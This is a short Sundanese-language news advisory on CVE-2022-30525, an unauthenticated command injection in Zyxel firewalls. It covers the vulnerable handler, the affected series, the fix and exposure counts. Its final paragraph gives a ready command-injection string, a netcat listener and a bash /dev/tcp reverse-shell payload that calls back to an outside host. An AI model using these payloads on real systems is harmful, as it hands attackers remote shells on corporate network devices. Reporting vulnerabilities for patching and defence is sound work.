Kerentanan dina firewall Zyxel anu ngamungkinkeun palaksanaan kode tanpa auténtikasi

Kerentanan kritis (CVE-2022-30525) parantos diidentifikasi dina alat Zyxel tina séri ATP, VPN sareng USG FLEX, dirancang pikeun ngatur operasi firewall, IDS sareng VPN di perusahaan, anu ngamungkinkeun panyerang éksternal ngaéksekusi kodeu. alat tanpa hak pamaké tanpa auténtikasi. Pikeun ngalaksanakeun serangan, panyerang kedah tiasa ngirim pamundut ka alat nganggo protokol HTTP/HTTPS. Zyxel parantos ngalereskeun kerentanan dina pembaruan firmware ZLD 5.30. Numutkeun kana jasa Shodan, ayeuna aya 16213 alat anu berpotensi rentan dina jaringan global anu nampi pamundut via HTTP / HTTPS.

Operasi dilumangsungkeun ku ngirim paréntah dirancang husus ka web Handler /ztp/cgi-bin/handler, diaksés tanpa auténtikasi. Masalahna disababkeun ku kurangna cleanup ditangtoskeun tina parameter pamundut nalika executing Paréntah dina sistem ngagunakeun panggero os.system dipaké dina perpustakaan lib_wan_settings.py sarta dieksekusi nalika ngolah operasi setWanPortSt.

Contona, hiji panyerang bisa lulus string "; ping 192.168.1.210;" nu bakal ngakibatkeun palaksanaan "ping 192.168.1.210" paréntah dina sistem. Pikeun meunangkeun aksés ka cangkang paréntah, anjeun tiasa ngajalankeun "nc -lvnp 1270" dina sistem Anjeun, lajeng initiate sambungan sabalikna ku ngirim pamundut ka alat jeung '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

sumber: opennet.ru

Tambahkeun komentar